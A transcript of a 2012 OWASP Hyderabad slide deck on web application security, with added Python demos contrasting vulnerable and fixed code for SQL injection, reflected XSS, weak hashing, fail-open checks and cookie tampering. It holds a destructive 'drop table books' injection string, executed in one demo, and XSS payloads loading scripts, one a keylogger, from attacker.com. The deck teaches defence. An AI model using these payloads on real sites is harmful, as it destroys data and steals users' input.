
How to secure web applications

2,243 views

Published on

I presented this presentation at the OWASP Hyderabad Oct 2012 meet. You can find more details at https://www.owasp.org/index.php/Hyderabad

Published in: Technology


  1. "The only truly secure system is one that is powered off, cast in a block of concrete and sealed in a lead-lined room with armed guards." - Gene Spafford
  2. A bird's eye view of securing web applications
  3. Hello everyone
  4. Imran Mohammed | Security Researcher | Null Hyd Moderator | OWASP Hyd Board Member | @imran_naseem
  5. Do you know?
  6. 90% of companies got hacked last year (http://www.computerworld.com/s/article/9217853/90_of_companies_say_they_ve_been_hacked_Survey)
  7. To name a few ...
  8. 60% got hacked twice
  9. 50% are unsure about this year
  10. Myths of AppSec
  11. Myth #1: We have a network firewall & WAF
  12. Myth #2: We have SSL, hence we are secure
  13. Myth #3: The testing team will handle security
  14. Myth #4: Nobody will attack us, we are a small organization
  15. "If you think technology can solve your security problems, then you don't understand the problems and you don't understand the technology." - Bruce Schneier
  16. Ten commandments of secure development
  17. Input is evil, validate it. Validate the source, context, syntax and semantics of the data, and the current and previous states.
  18. SQL Injection
      Front-end: https://bookstore.com/index.php?authorname=James
      Back-end:  SELECT title,year FROM books WHERE author = 'James'
  19. SQL Injection
      Front-end: https://bookstore.com/index.php?authorname=James'; drop table books;--
      Back-end:  SELECT title,year FROM books WHERE author = 'James'; drop table books;--'
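The two SQL injection slides, worked through as an added example that is not part of the deck: a Python/sqlite3 lookup that receives the slide's authorname value once through string concatenation and once as a bound parameter. The sample rows, the function names and the use of executescript() (standing in for a database driver that accepts stacked statements) are this example's own assumptions.

```python
import sqlite3

# Constructed sample data for the demo (not from the slides).
SAMPLE_BOOKS = [
    ("Dune", 1965, "Herbert"),
    ("Emma", 1815, "Austen"),
    ("Ulysses", 1922, "James"),
]

# The exact input from the slide, as it arrives in the authorname parameter.
INJECTED_AUTHORNAME = "James'; drop table books;--"


def make_db():
    """Build an in-memory bookstore database with the sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE books (title TEXT, year INTEGER, author TEXT)")
    conn.executemany("INSERT INTO books VALUES (?, ?, ?)", SAMPLE_BOOKS)
    conn.commit()
    return conn


def search_vulnerable(conn, authorname):
    """The slide's back-end: the query parameter is pasted into the SQL text.

    executescript() stands in for a driver that accepts stacked statements and
    runs every statement the string now contains. It discards SELECT rows, so
    this function only shows the injected statement's side effect.
    """
    sql = f"SELECT title, year FROM books WHERE author = '{authorname}'"
    conn.executescript(sql)


def search_safe(conn, authorname):
    """Fix: bind the value as a parameter; the SQL text itself never changes."""
    cur = conn.execute(
        "SELECT title, year FROM books WHERE author = ?", (authorname,)
    )
    return cur.fetchall()


def table_exists(conn, name):
    """Consult sqlite_master so the demo can show whether 'books' survived."""
    row = conn.execute(
        "SELECT COUNT(*) FROM sqlite_master WHERE type = 'table' AND name = ?",
        (name,),
    ).fetchone()
    return row[0] == 1


def demo():
    """Run both versions against the slide's input.

    Returns (rows from the safe query, table present after the safe query,
    table present after the vulnerable query)."""
    conn = make_db()
    safe_rows = search_safe(conn, INJECTED_AUTHORNAME)  # []: no author has that literal name
    safe_kept = table_exists(conn, "books")             # True
    search_vulnerable(conn, INJECTED_AUTHORNAME)
    vuln_kept = table_exists(conn, "books")             # False: the table is gone
    return safe_rows, safe_kept, vuln_kept


if __name__ == "__main__":
    print(demo())
```

With parameter binding the whole string is compared against the author column as data, so the injected input simply matches no row; the surrounding SQL cannot be altered by it.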
  20. Cross Site Scripting
      Functionality: https://example.com/error.php?message=Sorry%2c+an+error+occurred
      "Reflected" back to the client via the webserver: <p>Sorry, an error occurred.</p>
      Any problem? https://example.com/error.php?message=[can I change this?]
  21. Cross Site Scripting
      Attack users: https://example.com/error.php?message=<script src="attacker.com/malicious.js"></script>
      "Reflected" back to the client via the webserver: <p><script src="attacker.com/malicious.js"></script>.</p>
      More problems:
      https://example.com/error.php?message=<script src="attacker.com/keylogger.js"></script>
      https://example.com/error.php?message=<script>document.location.href="badsite.com"</script>
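The reflected XSS slides as an added example, not code from the deck: a Python stand-in for error.php that reads the message parameter from the slide's URLs and renders it either verbatim (the slide's behaviour) or HTML-encoded for the text context it lands in. The function names and the helper that checks for a live script tag are this example's own.

```python
import html
from urllib.parse import parse_qs, urlsplit

# The slide's URLs, used as inputs to the two renderers below.
NORMAL_URL = "https://example.com/error.php?message=Sorry%2c+an+error+occurred"
ATTACK_URL = 'https://example.com/error.php?message=<script src="attacker.com/malicious.js"></script>'


def message_from_url(url):
    """Read the 'message' query parameter the way error.php would (URL-decoded)."""
    params = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return params.get("message", [""])[0]


def render_vulnerable(message):
    """The slide's behaviour: the parameter is reflected into the HTML verbatim."""
    return f"<p>{message}</p>"


def render_safe(message):
    """Fix: HTML-encode the untrusted value for the context it is written into.

    quote=True also encodes both quote characters, so the same helper is safe
    when a value lands inside an attribute instead of element text."""
    return f"<p>{html.escape(message, quote=True)}</p>"


def reflects_script(rendered):
    """Demo check: does the rendered page still contain a live <script> tag?"""
    return "<script" in rendered.lower()


if __name__ == "__main__":
    for url in (NORMAL_URL, ATTACK_URL):
        m = message_from_url(url)
        print("vulnerable:", render_vulnerable(m), reflects_script(render_vulnerable(m)))
        print("safe:      ", render_safe(m), reflects_script(render_safe(m)))
```

The encoded output still displays the original text to the user, but the browser sees `&lt;script` rather than a tag, so nothing from the query string executes.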
  22. Check this
      POST /books/user1/search.asp HTTP/1.1
      Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel,
      Accept-Language: en-gb,en-us;
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
      Cookie: PHPSESSIONID=24c9e15e52afc47c225b757e7bee1f9d
      Host: www.example.com

      q=sqli
      hidden_field=20
      [slide callouts reading "Check this" beside the Cookie, q and hidden_field lines]
  23. Use cryptographically strong algorithms
  24. Base64 is not encryption
      Cookie: lang=english; sessionid=aW1yYW4=
      Cookie: lang=english; sessionid=cmFnaHU=
  25. MD5 is not good enough
      http://www.example.com/salary/view/8635f8ebae3017a5581dbeba572eb01a
      Google it
  26. Use SHA-2 or better, with salt
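Slides 24 to 26 as one added example (not from the deck): decoding the slide's Base64 cookie values back to the identities they hold, showing why an unsalted digest such as MD5 is the same for every user with the same input, and the recommended alternative, a salted SHA-2 construction (PBKDF2-HMAC-SHA256 here) with constant-time verification. The stored-hash format string and the function names are this example's own assumptions.

```python
import base64
import hashlib
import hmac
import os

# The two cookie values from the slide.
COOKIE_VALUES = ["aW1yYW4=", "cmFnaHU="]


def decode_base64_cookie(value):
    """Base64 is an encoding, not encryption: anyone holding the cookie can reverse it."""
    return base64.b64decode(value).decode("utf-8")


def md5_hex(text):
    """Unsalted MD5 as on the salary slide: equal inputs always give equal digests,
    which is exactly what makes a precomputed lookup ("Google it") work."""
    return hashlib.md5(text.encode("utf-8")).hexdigest()


def hash_secret(secret, salt=None, iterations=200_000):
    """Salted SHA-2 via PBKDF2-HMAC-SHA256 (the '$'-separated format is this demo's own).

    A fresh random salt per value means two users with the same secret get
    different stored hashes, so no shared lookup table applies to both."""
    if salt is None:
        salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", secret.encode("utf-8"), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${digest.hex()}"


def verify_secret(secret, stored):
    """Recompute with the stored salt and iteration count; compare in constant time."""
    algo, iterations, salt_hex, digest_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        raise ValueError("unsupported hash format")
    digest = hashlib.pbkdf2_hmac(
        "sha256", secret.encode("utf-8"), bytes.fromhex(salt_hex), int(iterations)
    )
    return hmac.compare_digest(digest.hex(), digest_hex)


if __name__ == "__main__":
    print([decode_base64_cookie(v) for v in COOKIE_VALUES])
    print(md5_hex("tiger") == md5_hex("tiger"))       # same for every user: True
    stored = hash_secret("tiger")
    print(stored != hash_secret("tiger"))             # salted: differs each time
    print(verify_secret("tiger", stored), verify_secret("lion", stored))
```

The iteration count is what makes guessing slow; the salt is what makes precomputation useless. Both must be stored alongside the digest, as the format above does, so verification can repeat the exact computation.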
  27. Minimize attack surface
  28. Use least privilege
  29. Keep security simple. Keep the design as simple and small as possible; a complex design is difficult to understand and secure.
  30. Provide defense in depth
  31. Fail safely
      isAdmin = true;   // insecure default: stays true if the code below throws
      try {
          codeWhichMayFail();
          isAdmin = isUserInRole("Administrator");
      } catch (Exception ex) {
          log.write(ex.toString());   // logged, but isAdmin is still true
      }
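The fail-safely slide as an added example (not from the deck), transliterated to Python: the slide's fail-open pattern next to the fail-safe version, with a constructed role directory that can be made to fail the way codeWhichMayFail() might. Names such as is_user_in_role and the directory_up switch are this example's own.

```python
class RoleLookupError(Exception):
    """Raised by the constructed dependency when the role check cannot complete."""


def is_user_in_role(user, role, directory_up=True):
    """Stand-in for the slide's isUserInRole(): consults a role directory.

    directory_up=False simulates the dependency failing mid-check."""
    if not directory_up:
        raise RoleLookupError("role directory unreachable")
    roles = {"alice": {"Administrator"}, "bob": {"User"}}  # constructed role table
    return role in roles.get(user, set())


def check_admin_fail_open(user, directory_up=True):
    """The slide's code: the default is True, so any exception leaves the
    caller believing the user is an administrator."""
    is_admin = True
    try:
        is_admin = is_user_in_role(user, "Administrator", directory_up)
    except Exception as ex:
        print("log:", ex)  # logged, but the insecure default survives
    return is_admin


def check_admin_fail_safe(user, directory_up=True):
    """Fix: start from the least-privileged state; a failure denies access."""
    is_admin = False
    try:
        is_admin = is_user_in_role(user, "Administrator", directory_up)
    except Exception as ex:
        print("log:", ex)
    return is_admin


if __name__ == "__main__":
    for name in ("alice", "bob", "mallory"):
        print(name,
              "fail-open:", check_admin_fail_open(name, directory_up=False),
              "fail-safe:", check_admin_fail_safe(name, directory_up=False))
```

Both versions behave identically while the directory is up; they differ only on the error path, which is where the slide's bug lives and where a test suite rarely looks.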
  32. Avoid security through obscurity
  33. Cookie: lang=english; ADMIN=no; sessionid=yj3735mmhdABC
      Cookie: lang=english; ADMIN=yes; sessionid=yj3735mmhdABC
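The ADMIN cookie slide as an added example, not code from the deck: the two cookie headers from the slide are fed to an authorization check that trusts the client's ADMIN flag and to one that treats the cookie purely as a session identifier and resolves the role on the server. The session store and its contents are constructed for the demo.

```python
from http.cookies import SimpleCookie

# Constructed server-side session store: the opaque sessionid from the slide
# maps to a user record that exists only on the server.
SESSIONS = {
    "yj3735mmhdABC": {"user": "imran", "role": "user"},
}

# The two cookie headers from the slide; the second is the client's own edit.
HONEST_COOKIE = "lang=english; ADMIN=no; sessionid=yj3735mmhdABC"
TAMPERED_COOKIE = "lang=english; ADMIN=yes; sessionid=yj3735mmhdABC"


def cookie_value(header, name):
    """Return one cookie's value from a Cookie header, or None if absent."""
    jar = SimpleCookie()
    jar.load(header)
    return jar[name].value if name in jar else None


def is_admin_trusting_cookie(header):
    """The slide's flaw: an authorization decision made on a flag the client controls."""
    return cookie_value(header, "ADMIN") == "yes"


def is_admin_server_side(header):
    """Fix: the cookie only identifies the session; the role comes from server state."""
    session = SESSIONS.get(cookie_value(header, "sessionid"))
    return session is not None and session["role"] == "admin"


if __name__ == "__main__":
    for header in (HONEST_COOKIE, TAMPERED_COOKIE):
        print(header)
        print("  trusting cookie:", is_admin_trusting_cookie(header))
        print("  server-side    :", is_admin_server_side(header))
```

Hiding the flag name or encoding its value would not help: the fix is that the client never carries the decision at all, only an unguessable reference to state it cannot edit.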
  34. Fix security issues correctly
  35. Use secure defaults. Remember scott/tiger? And admin/password (routers' admin panels)
  36. Don't reinvent the wheel
  37. How to develop/fix the code securely?
  38. Follow a Secure SDLC
  39. OWASP Development Guide
  40. Educate developers/users
  41. Use OWASP ESAPI
  42. Typical OWASP ESAPI example
  43. Thanks!
  44. Questions?
  45. Credits: all icons are taken from The Noun Project; OWASP project-related images are taken from owasp.org
